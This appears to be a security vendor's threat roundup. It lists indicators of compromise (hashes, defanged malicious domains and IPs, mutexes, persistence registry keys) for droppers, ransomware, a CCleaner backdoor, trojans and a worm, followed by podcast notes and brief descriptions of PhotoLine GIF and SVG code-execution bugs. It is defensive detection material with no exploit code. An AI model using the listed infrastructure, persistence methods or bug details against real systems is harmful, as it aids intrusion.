• 339ceac2076e833babc1ac838848ab2787af062835a24f05e0bf20ab1ec79ccf
• 6f276350ce399502dbf870702e1a09ee39b591b93ebface9d3214ce9822aed61
• 7dd8b4746bf2de079b3b66e9d5e0492cde0a3838311252176a8831c3fd64b33b
• 7e4ef415a75cea7d3d610c44c0fa51d0fba956cc8136784115641054cd470fa0
• 9394e12d1fe6d3627f5f928aff4a15699aa129e44fd4fd9eba29f6ad5a4f7556
• a5dfb783b89232fcc317194d267b8cf7204ae457d86eb5cdf703a656c03f1b71
• a601c81547e7180d284e2fa701599615070653cceaf63108a11c40821edbf024
• baba92ad2bf34ef95611656722344af6b60f731e7cdc4a341f64658837976899
• bb4793538712834408cd9b3b58c1edf8da81906ffc12e25766fb40ddabe1c383
• 50c1020efca0698519c89b468fc25926d1bad2eeb421482d9c17b6ab24535217
• d29a6afc4b35eef25811664369471688a0ecd89fc2a5eb676de9c5518c9914f2
• db4d85d172b31413c1f93162053032a9a2e26b273dfdea8b7506ee8ca982e32f
• f745e3687dabecb07c033a70db4f8c2cb14b9fc75c896304f6e9ed4dc6e3a1ba
• fff6555400d65b28590cdde1a1f1a8731f02e8c21c1a9f167d53dc1054cc865a
• 522a804aeee581c63049d0a5983a558c2a3225c4b14814cf0acb8912b79260d6

Coverage

Screenshots of Detection

AMP

ThreatGrid


Umbrella

---

Doc.Dropper.Agent-6336814-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• acsbaroda[.]com
• a[.]pomf[.]cat
• b[.]reich[.]io
• directlink[.]cz
• nusacitracipta[.]co[.]id
• u[.]teknik[.]io
• wallpaperbekasi[.]co[.]id
• www[.]b-f-v[.]info
• www[.]noosabookkeepers[.]com[.]au
• www[.]powerplusscable[.]com
• www[.]styrenpack[.]com

Files and or directories created

• \Users\Administrator\Documents\20170920\PowerShell_transcript.PC.Pbzg9q9Z.20170920011010.txt
• \TEMP\Quotation_211.xls
• %AppData%\Microsoft\Office\Recent\Quotation_211.LNK
• %AppData%\Microsoft\Office\Recent\277336261.xls.LNK
• %AppData%\Jaty\WebHelper.exe

File Hashes

• 760d89498b3029b1c6fdc5feefa16170589a4b61414c6b1e9d76611031ab0bd5
• 19dc470f8c9a1a4e9e24707b68c43138178e81d4ec74e358941756667633c5b7
• 1d14387de0375c84c8c334fb4d29c8ec4e3c24cd9969bcd3acbb77cb65f77a11
• a80e8da4851eccfad1b8c2b930389a1980dcdab0d193073a4d3dac2d6a0e73d7
• f84e3b79c16a77db33d1f5ee66fa13d15f25fed78d219d77dfe83268650cd944
• d1e2655394e9ffd7f7d502840ace6b0de7369c938abee8c1ddc84dcf73486dd3
• 81b61e9dd4682b079e0b1df3250640c99e0228d4bdcbef5f18bf4bd8fedbff09
• 5af528ce89a31516eb1b5303b0789b56ab64ad16d7d15193c8b24b5ac3ff22a0
• a9fec7f8f911f431dd9934092903974c3206feefac7308f48087ab02fbc24927
• 93a1ddd820a187fd8db5ce8d595958fcfb34ea5c01b5971b359f318f8fe7bb3b
• 4eb507bf63d6273548238a6c7e6831b6b29363c1c37e9176b7c72a6c3faa862d
• cffb8b6c103a443159c94dadd5058c3c083d906600f0db6291ab0e2f4c005b68
• 127cae520479d08e0bfa1b569ace82203cd8154f49f7a8569bfbc54d4c8c6da8
• dfca64bac0dd845e4e0d98a0f0ce3ae235cddf2f6506fabb7923a2d5e0da3129
• c1f97901518b6dab1c4516a7f400430030011c26f52cd429299d4331938b70bd
• c3baeac24f2416d21e64df05b568600c3be76a6365e7cb5b8dbfdfe64ae95c46
• ac535056dcd65160165ad9e53bc5bc4e08b61ce129fb37d7f7b727c4e1a875df
• af9f674bc5a26324b62f8c5a67f256b6133b2ec26a25a7c93564fe048ae4afd4
• 2b06143fffe0099302b2ec0b6f40b5aac115f37c61db32a3be6e0ed13d8eee85
• 2eba0e3bb658230fe8617038b6be0f58d042a8bb13dd4d9169e775263f82eab3
• 304c6f454f0efca218002c12009518c27e63186dd5de57b652cf2d4d14c7f0a4
• b75f01bb44d8a7f402bf01683230ff71138509344bd13d7c199855a321c26b30
• 5b5b1960bb43c0c115080b3393aaa263137141d53f6b173b24f6c08cbe86d2f8
• 51d6c81b77f098af1b463f72d236d44b21d873f3c8360004ac93ba803db620a9
• f4eb5c188028bd80eaf5e822fd6e80e6d2826215e6698668202b72aedabc3daf
• d8b26ec2609f02379d8b8489f0b52f060e1d5f2dea369dbb675c408c29f83401
• 81dea09c54a4f26cc078d1b341d5172ceeb5229861621e99552854c564747c83
• 80c8b5fad0efae1c96e51d97a3ae2ee0e3c9d802691e7178da29b12f23b0f2a0
• 5742ca6839d7b0b6e56f5406fcb744180bc76e81f7ebdc626b432ab3c1b3de81
• c1fb997c7dd23f0bb6f19e20029650fc890beca44fbe2f50e21a001b3aa1d319
• 2159c51a8951b68089524aec9cbb7ba171da57baf733bd12c7d7741d8f17e55b
• bef55fe81de1a2eb2c0a9e647619a483093b031f5c797d5a8e32bb787356e33a
• 7f0a79692fc21938be2f2acab035a56049a9444a8e380d62615546efd0862335
• e618be36548c349562bbdc6c4d68efcb2c86b4354037e9014fd91eea3ec0a0ca
• 100b1db7896fbd9c4415a96aed0383babbc43ac1f6ae589d408d39532ce9125b
• f48ecc2b672bc937370ef812eb1b23e3e76e680a2a96aff2d58af8331eb75cfe
• da2ee40c1fcf98c416132ddf8d4a533f387fcc2214772588bf2ab0967a7d1ede
• b5fd96e20d32e4f805c4b157037b8e382ff2ce3564fad2f5b3d3c7b6247ea1e2
• bfc11420c2e7d86d66ca3c4cd495a47b7882d6abbb7a8cc87a58ce9e3daaacaa
• 5f5e981122a6264042e5b79860200c894538cb134d2c93d3f15750ec9443c7f2
• 76a940a6ef4397c6b7c8d1ba0dca3e891c2d526f58c03c766d041b98a8791e54
• 5056b55b83863c4ac1ed6ee66e4d2dc0de8b56416dd96cf712f5b889aeff5cdf
• f9e29f39b89918fcf26237c5002cd98a2a001c37690720ba537eebd0e72a56cd
• 6264bc92083a561dd31c38fc752589eb7e8dd65fa2b6c792d2dd247b5f63ff98
• 544eac3c9205cc3ecaf57283c823050df3bfe4ce78d0c7e38592ef333cc8bdc8
• dce3ff33424c5e43795ffba7ad33ee8a301606e3c4406e2cd1d07cf6d789ac8e
• 633dd2217d33b8a60f3ca98905bb7119d7d63e8db50525452c5bfe5449b7885d
• 6386f608f5f0fb7007ecf808b9a96048c4fc1fe3c20637332b9da1e5094972c5
• 60d4c6a68368b14ce9aa0b6b3e8eb91e92f823f6524a49e4e7cc265353982898
• 9804648f30f0a4af07a729f3bf0aa2cf23ed4174c8a1a9ffd98694efb3c51e2c

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Macro.DownloadExe-6336397-0

Indicators of Compromise

Registry Keys

• N/A

Mutexes

• N/A

IP Addresses

• 66[.]55[.]90[.]17
• 52[.]179[.]17[.]38

Domain Names

• a[.]pomf[.]cat

Files and or directories created

• \TEMP\~$L Receipt.doc
• %TEMP%\CVRFC94.tmp.cvr
• \TEMP\gkmgax.exe
• \TEMP\DHL Receipt.doc
• \srvsvc
• %AppData%\Microsoft\Office\Recent\runme.doc.LNK
• %SystemDrive%\~$runme.doc
• %AppData%\Microsoft\Office\Recent\DHL Receipt.LNK

File Hashes

• 9fa533406df0d2d165f46f37d1167fdb97ff388a5e84b60bfd75921c6f44ff6c
• 74805a5b0a8171f723627c8b061805a6c9c098e7ce1ea83378a774769bc7a1c6
• f861caffda478a4227bf06323ef32407f774274cdacf2e5e23506d67a08cd89c
• 9fa533406df0d2d165f46f37d1167fdb97ff388a5e84b60bfd75921c6f44ff6c
• 0ef4406f5608ad25b4c61d37b6ece1b71c2738814528af550dde14917d2cb4e3
• f8dcc75be0d1354741606663aebb95e477fe1d4e46246e677fc0e414b7dd354f
• 216f09c6eff72fae7d6511a73be7530e80980ff6305e4dd2656c96aec29f242e
• 265de60479b8d8bd46b56a7bec778d6ef9c62a9053e42c6a632d52cdc16a9490

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Doc.Macro.VBSDownloader-6336817-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass

Mutexes

• Global\MTX_MSO_AdHoc1_S-1-5-21-2580483871-590521980-3826313501-500
• Local\ZonesLockedCacheCounterMutex
• Global\MTX_MSO_Formal1_S-1-5-21-2580483871-590521980-3826313501-500
• \BaseNamedObjects\Global\I9B0091C
• RasPbFile
• Local\WinSpl64To32Mutex_e39d_0_3000
• Local\MSCTF.Asm.MutexDefault1
• \BaseNamedObjects\MD99F8B3
• Local\10MU_ACB10_S-1-5-5-0-58054
• Local\ZonesCacheCounterMutex
• Local\10MU_ACBPIDS_S-1-5-5-0-58054
• Global\552FFA80-3393-423d-8671-7BA046BB5906
• \BaseNamedObjects\Global\M9B0091C

IP Addresses

• 50[.]63[.]119[.]1

Domain Names

• lymanite[.]com

Files and or directories created

• %SystemDrive%\~$c69c4b9785cdc861c8fae99998a1ad011cf2e98456a1891bd29bcc990897f0.doc
• \TEMP\gescanntes-Dokument-07170222835.doc
• \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24E5C5A3-7CF5-41D8-94C1-47B41F61C27E}.tmp
• %AppData%\Microsoft\Office\Recent\fac69c4b9785cdc861c8fae99998a1ad011cf2e98456a1891bd29bcc990897f0.doc.LNK
• %TEMP%\64388.exe
• %AppData%\Microsoft\Templates\~$Normal.dotm
• \TEMP\~$scanntes-Dokument-07170222835.doc
• %AppData%\Microsoft\Office\Recent\gescanntes-Dokument-07170222835.LNK
• %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\42994.exe
• %AppData%\Microsoft\Office\Recent\Local Disk (C).LNK
• %TEMP%\CVR26FE.tmp.cvr
• \Users\Administrator\Documents\20170926\PowerShell_transcript.PC.sJClvqz1.20170926112823.txt

File Hashes

• fac69c4b9785cdc861c8fae99998a1ad011cf2e98456a1891bd29bcc990897f0
• 0274541153434372cb7c0bdc7f55c5b70a48ab0c22907611a89139d2073826bf
• 12b2acf3a81b16850fec270f521ba9b749a340f1357f225e495462822409da12
• 1d1407735650c83e62a561a1ea5cdc798aa1cdc92653f5e722dc8b22b5ed9a7c
• 2b4bbedb5119cd52c44fe035ee5b00b520792db60207ffd6ce3cdc339901346d
• 476e8075ba4866c0a78253dcb19961b28f150aa207d50b575b0d07fdcca4aa13
• 477bbf5395742a4e45331d71c6de3191729fbbf5914457ccfef7eb9d3e8697c7
• 4cfd3f25f178f5ae5dd5c5438a4bc3cd0af2ca712a5a59388612697d4b4424d4
• 5bb5975dd0b781d5fab3721ae66463e64825fccfdcf876bcb8899c2571ed04f4
• 5dc91a43bfcf5f4b4c2a759220e9eacec671bc275572b6feeca274d9c4836829
• 61411a7a585f12f1d3e60eb084e9dac648217b922a3d68ce4024b26a6fcce3cc
• 69b35b1bffd2d36c06d4598de38fa4364e726044623d89bc73fc1e9b31f57e71
• 6c0bf54da7ee15bf99b7ff6be57ee8331d8335a1d15513227c6ada04c841c4de
• 71cc8b291e0a1ad38ed9142eb112f56c4a8a3eb00d130bfa27e5c40a08bc9e43
• 75eb214657020fd9b6f2d533d3c12724cf1de2adbb925d7abfd744e6ff73633d
• 7cc1a551e6060d0e7a38423a2247edd4a84b6cca927f996d2bc056269dedb6e6
• 908b6ea63e3e916377fe0319886bf4b55c7aaddde27292b9dce5930eede5622a
• a2fe92fa39d6b0f9dbfebd83be179524fadb87b11e555eee96c606af7d34ce73
• b6bfdbfcbb5097912ad8bdf9cec2592a162a27b7c367193d1fdd10d9db5182dc
• b7651bd99dda94f6bf962b473872690ee145c38546cd7b3f8bb477976d9a8617
• c77d0bee9502f8d4c3afc1729a7ab9721ffce9bf2b7759d086e436370af4ff5c
• d621d5dea6a95c31650a4c46aaf507625a8e18f33b5a4a22e8a801c25dc77a49
• d919139e4965ad6c55b7f08e2f919aac5fd8deb0fd90cf65f2bd4a4aa5bd2dd8
• d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91
• df5c68270b14d82a523a503a717de1ccfe1739c62956e7a58aa8441f117b7344

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Win.Ransomware.TorrentLocker-6336835-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: etejasix
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyEnable
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
• Value: ProxyBypass
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: AutoConfigURL
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS
• Value: ProxyOverride
• <HKLM>\SYSTEM\CurrentControlSet\Services\VSS\Diag\Shadow Copy Optimization Writer
• <HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Mutexes

• \BaseNamedObjects\Global\otydesuxofyjyxufexycaga
• Global\otydesuxofyjyxufexycaga
• \BaseNamedObjects\Global\yjacitumaxicuqexyfitywoqewyquwy
• qazwsxedc
• Global\yjacitumaxicuqexyfitywoqewyquwy

IP Addresses

• N/A

Domain Names

• wrygsxi[.]zotebsca[.]net
• atawgce[.]zotebsca[.]net
• adez[.]zotebsca[.]net
• uluxkqopy[.]zotebsca[.]net
• efedaluc[.]zotebsca[.]net
• mxed[.]zotebsca[.]net
• omywuw[.]zotebsca[.]net
• imjmawfcoja[.]zotebsca[.]net
• evycoroz[.]zotebsca[.]net
• erivequt[.]zotebsca[.]net
• aqyjo[.]zotebsca[.]net
• usuhazepug[.]zotebsca[.]net
• avev[.]zotebsca[.]net
• fhuga[.]zotebsca[.]net
• uqydjnwn[.]zotebsca[.]net
• evehasuruzo[.]zotebsca[.]net
• ypyhi[.]zotebsca[.]net
• epabojyluko[.]zotebsca[.]net
• iqesex[.]zotebsca[.]net
• ywapivuqexe[.]zotebsca[.]net
• ihodi[.]zotebsca[.]net
• rtacin[.]zotebsca[.]net
• aliragifut[.]zotebsca[.]net
• eztcu[.]zotebsca[.]net
• ukajusi[.]zotebsca[.]net
• okypag[.]zotebsca[.]net
• ubapimiwdj[.]zotebsca[.]net

Files and or directories created

• %WinDir%\edaraxoz.exe
• %AppData%\uqetukykopefyvij\02000000
• %AllUsersProfile%\uqetukykopefyvij\02000000
• %AppData%\uqetukykopefyvij\01000000
• %AllUsersProfile%\uqetukykopefyvij\01000000
• %AppData%\uqetukykopefyvij\00000000
• %AllUsersProfile%\uqetukykopefyvij\00000000
• %WinDir%\ukavdnlj.exe

File Hashes

• 1a78a5c1c4ebb8a0047cbb4a8a27782212603d71cae2aeb033bceab76795a294
• 4312486eb32d7edc49d437a598d7e0453e8c9d1222b8b9ba429c73e0598db1a9
• 58f36594d9502e3e8e135d0a449e5c07a62ae6fcd34a32c5c4d9243cb28d958b
• 5c66755aeeed65c21c8d9774baebd79c962311a57b733cb19d4d2bb6a0eb52c3
• ae7a23e9b4c2645c26dce4a83a97953fa5ca008570aa9ac32e0826369593a099
• ba4fe6e91aae42e7a12747422443a361201898a4a5d2454472cf8d42b8d5cc52
• bf795a1676a6dd795fb6915ecfbfdc200687907cae8769c55b9e26328b026f88
• cc07ae7275b177c6882cffce894389383ca2c76af5dc75094453699252c9c831

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Spyware.CCBkdr-6336251-2

Indicators of Compromise

Registry Keys

• <HKLM>\HKLM\SOFTWARE\Piriform\Agomo
• Value: NID
• <HKLM>\HKLM\SOFTWARE\Piriform\Agomo
• Value: TCID
• <HKLM>\HKLM\SOFTWARE\Piriform\Agomo
• Value: MUID

Mutexes

• N/A

IP Addresses

• 216[.]126[.]225[.]148

Domain Names

• N/A

Files and or directories created

• N/A

File Hashes

• 04622bcbeb45a2bd360fa0adc55a2526eac32e4ce8f522eaeb5bee1f501a7d3d
• 1a4a5123d7b2c534cb3e3168f7032cf9ebf38b9a2a97226d0fdb7933cf6030ff
• 30b1dfd6eae2e473464c7d744a094627e5a70a89b62916457e30e3e773761c48
• 53c6ad85a6b0db342ce07910d355dad53765767b4b9142912611ec81bee0f322
• 6f7840c77f99049d788155c1351e1560b62b8ad18ad0e9adda8218b9f432f0a9
• 8562c9bb71391ab40d4e6986836795bcf742afdaff9a936374256056415c5e25
• 8a8485d2ba00eafaad2dbad5fad741a4c6af7a1eedd3010ad3693d128d94afab
• dbf648e5522c693a87a76657e93f4d44bfd8031c0b7587f8b751c110d3a6e09f
• 07fb252d2e853a9b1b32f30ede411f2efbb9f01e4a7782db5eacf3f55cf34902
• 128aca58be325174f0220bd7ca6030e4e206b4378796e82da460055733bb6f4f
• 27a098761e8fbf4f0a7587adeee8eb787c0224b231b3891fa9323d4a9831f7e5
• 2bc2dee73f9f854fe1e0e409e1257369d9c0a1081cf5fb503264aa1bfe8aa06f
• 2c020ffa3436a69a1b884b5b723909c095e5e58406439287ac4c184a3c3c7da7
• 76cd0370af69d5c76e08673976972fee53764fca67f86fcf0db208b87b7341d6
• 8038ea1b72a720f86397fd2ee1f386bb832e5cbd8e12f97e11e0c787bde9e47e
• dc9b5e8aa6ec86db8af0a7aa897ca61db3e5f3d2e0942e319074db1aaccfdc83
• e8e02191c1b38c808d27a899ac164b3675eb5cadd3a8907b0ffa863714000e72
• f0d1f88c59a005312faad902528d60acbf9cd5a7b36093db8ca811f763e1292a

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

Screenshot

---

Win.Trojan.Beeldeb-6336738-0

Indicators of Compromise

Registry Keys

• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2

Mutexes

• \BaseNamedObjects\hTGfNaKIQ4lPz

IP Addresses

• 41[.]45[.]138[.]91
• 156[.]203[.]64[.]64

Domain Names

• microsoft[.]net[.]linkpc[.]net

Files and or directories created

• %TEMP%\EqEhol.exe
• %TEMP%\JTVxon.txt
• %TEMP%\NJiSUL
• %AppData%\njisul\NJiSUL
• %AppData%\njisul\EqEhol.exe
• %AppData%\njisul\fXMlDZ.exe
• %AppData%\njisul\JTVxon.txt
• %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\gmail.lnk

File Hashes

• bb8e4aec824aa052fdda739abb8472caf2bd6c34d1773248ea3072e5c024140a
• 2c89cbab497a1a5219b5d66f1ba39473b6ffc15ec4f53a2bb09c070a15a537e8
• 36e92852d67e66cb3c99312f107f83080605c2badf787108f619d6b54e6c85fc
• 1e76a00a1e6e4265ad5ff364d3139a62013a9628d90edd7e6a155e7f0a8193e8
• 07de12cf4c78151a0bdd6d8dcf8b5d0b91f51b606fd8ec0774e54fcb16e3440a
• e15dc2879dccd3c62d77169fe77d869455e61e2706006da829013d55b42107ba
• ca07844200067101a91d23604a7fb425ee8b47a66567a953103a9949f66d74cc
• c4cf29d4e6a6b905e08534108ab07318d5704d91df50c9d5477b998a19395eff
• a864f592f8fd01a57cf8302056a413e4a688f6cfa2beae8c5e136a40384f7b56
• eea366f807de6e4a0834e9fcf8dc0847b7ab4707314191448950a22cc0dbfa76

Coverage

Screenshots of Detection

AMP

ThreatGrid

---

Win.Trojan.Cossta-237

Indicators of Compromise

Registry Keys

• <HKLM>\SYSTEM\ControlSet001\Services\Alerter

Mutexes

• \BaseNamedObjects\44-41

IP Addresses

• N/A

Domain Names

• wenrou88[.]3322[.]org

Files and or directories created

• %SystemDrive%\Program Files\Microsoft Explorer\AAA.exe

File Hashes

• e8feccbab518346c0ec9ea3787f3b09994e41ca278aa537bc753fa1d6b40d1c4
• b955412a8b6ec7d48b70bc2ed05226755c2b418a075fd0e3f98ba52086caa495
• de37309306863d4a1b6f12a9c6e047fd93a9645f8acdbcc2f36f65d00226af2d
• 2e3b79c0bc90f46218700afba5d5a55cb00832969a00f254ec113d342d76a992
• 38a58d5c41f91b483ae727e922039848e14410c485db577cd0e21ee28e8fa250
• 424e36fd9975a43f25fad06e0282833d1280bcd9e6d5ef8221dc322fd16fbaa0
• 83062a56de8404db9311d60c87cccc4c25a8887952e695e5ffa0ac2600606706
• 94bc3ce60f0750456467c4262543e1196eb8a3294fcd79441ef7250e8fdf7885
• 5ed30bc2f7412875ccba2ade6e124154eda0788d555978ab6b60a69dbdf0bac1
• f81a1362894fa49b7008cffe93365ef2158180be9a935ae17acc2bafa8f983d9
• 6e678b7d3a7a46f20a19079644f0d879f03b1cad83e441ca64a4c0d1076d9ebb
• f9e9a3d7b7bffae8cda1b3ff4c893933eff386b26fd035fa4bb61c7c31bf2690
• 53c7cececf2d29386f3184e588c5a0ec558292ff227891d3ce5605f82a5f9688
• dfbafa207c90d3d4e20dabe7620f901e1abe30fa0fa4dd06bfabe852f8f1f0bc

Coverage

Screenshots of Detection

AMP

ThreatGrid

Umbrella

---

Win.Worm.Untukmu-5949608-0

Indicators of Compromise

Registry Keys

• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER
• Value: DisableMSI
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: System Monitoring
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
• Value: NoFolderOptions
• <HKCU>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
• Value: DisableCMD
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
• Value: DisableRegistryTools
• <HKCU>\CONTROL PANEL\DESKTOP
• Value: ScreenSaveTimeOut
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CABINETSTATE
• Value: FullPathAddress
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: xk
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
• Value: DisableConfig
• <HKLM>\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT
• Value: AlternateShell
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG
• Value: Debugger
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\INSTALLER
• Value: LimitSystemRestoreCheckpointing
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
• Value: Userinit
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: internat.exe
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
• Value: DisableRegistryTools
• <HKCU>\CONTROL PANEL\DESKTOP
• Value: SCRNSAVE.EXE
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\AEDEBUG
• Value: Auto
• <HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS NT\SYSTEMRESTORE
• Value: DisableSR
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
• Value: HideFileExt
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
• Value: ShowSuperHidden
• <HKCU>\CONTROL PANEL\DESKTOP
• Value: ScreenSaverIsSecure
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: MSMSGS
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: LogonAdministrator
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
• Value: Hidden
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{C8E6F269-B90A-4053-A3BE-499AFCEC98C4}.CHECK.0
• Value: CheckSetting
• <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
• Value: Shell
• <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
• Value: NoFolderOptions
• <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
• Value: ServiceAdministrator
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\System\
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\Explorer\
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\
• <HKLM>\SOFTWARE\CLASSES\lnkfile\shell\open\command
• <HKCU>\Control Panel\Desktop\
• <HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows NT\SystemRestore
• <HKLM>\SOFTWARE\CLASSES\batfile\shell\open\command
• <HKCU>\Software\Policies\Microsoft\Windows\System\
• <HKLM>\SOFTWARE\CLASSES\piffile\shell\open\command
• <HKLM>\SYSTEM\CurrentControlSet\Control\SafeBoot\
• <HKLM>\SOFTWARE\CLASSES\LNKFILE\SHELL\open
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug
• <HKLM>\SOFTWARE\CLASSES\lnkfile
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Run\
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
• <HKLM>\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\Installer
• <HKLM>\SOFTWARE\CLASSES\exefile
• <HKLM>\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
• <HKLM>\SOFTWARE\CLASSES\exefile\shell\open\command
• <HKLM>\SOFTWARE\CLASSES\LNKFILE\shell
• <HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\System\
• <HKLM>\SOFTWARE\CLASSES\comfile\shell\open\command

Mutexes

• N/A

IP Addresses

• N/A

Domain Names

• N/A

Files and or directories created

• %System32%\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
• %WinDir%\setupact.log
• %System32%\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
• %System32%\wdi\LogFiles\BootCKCL.etl
• %WinDir%\Tasks\SCHEDLGU.TXT
• %System32%\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\S-1-5-21-2580483871-590521980-3826313501-500_UserData.bin
• %System32%\wfp\wfpdiag.etl

File Hashes

• 9e0419794e2d948623f74a1443a553946334beaaa1c902ddc2741b1586a3bd89
• 6735181a112e87550dba81d667012250ff78959cdfe4852043c35895a4a53635
• fdb82a1a0c8b84d22d87e373d37a09cbbee481eca77a695f0a42b0ce8e7d15fb
• 1c3d3774371a96d8dac17ef186e1d10e6520fc82d9325974f4191d437bfa106a
• c7e85bc2b8120dec204e5592ab9254e90030cf3a13a2281d047c1d0bcb878d10

Coverage

Screenshots of Detection

AMP

ThreatGrid

Beers with Talos (BWT) Podcast Episode 14 is now available.  Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

EP14 Show Notes: 

We haven’t gone around the table and introduced ourselves in some time (about 50k downloads ago), so we take the time we usually complain about things at the top of the show to do that.

We have seen a massive amount of “top-tier” threats in the last six months or so. While it might seem like comparing apples and oranges (hint: it is), the crew takes a stab at ranking these recent threats/attacks: CCleaner, Deloitte, Equifax, Nyetya, SEC, Shamoon2, WannaCry. Shockingly, all of us have a different ranking. What’s your list look like?

These vulnerabilities are discovered by Piotr Bania of Cisco Talos.

Today, Talos is releasing details of multiple vulnerabilities discovered within the Computerinsel GmbH PhotoLine image processing software. PhotoLine, developed by Computerinsel GmbH, is a well established raster and vector graphics editor for Windows and Mac OS X that can also be used for desktop publishing.

TALOS-2017-0387 (CVE-2017-2880). TALOS-2017-0427 (CVE-2017-2920) and TALOS-2017-0458 (CVE-2017-12106) may allow an attacker to execute arbitrary code remotely on the vulnerable system when a specially crafted image file is opened by the PhotoLine image processing software.

Technical details

TALOS-2017-0387

An attacker may be able to manipulate GIF content to control a counter variable that controls memory writes, and cause PhotoLine to overflow memory, potentially resulting in a remote code execution.

Specifically, a short byte value is read from a GIF file from which the variable counter is calculated in the vulnerable code of PhotoLine and used in a memory loop containing memory write instructions. Further details can be found here.

Graphics Interchange Format image files are universally used and are one of the most popular image formats today on the internet.

TALOS-2017-0427

During the parsing of SVG files, memset function is executed with a size parameter that can be controlled by attacker. Specifically, the size parameter is calculated from the SVG path's D attribute which is a string containing a series of path descriptions that could be manipulated. The bug requires the feGaussianBlur filter to be attached to the path style. Further details can be found here.

Scalable Vector Graphics image files are often used and are one of the popular image formats today on the internet, with support for interactivity and animation. All major web browsers support rendering of SVG files.

TALOS-2017-0458

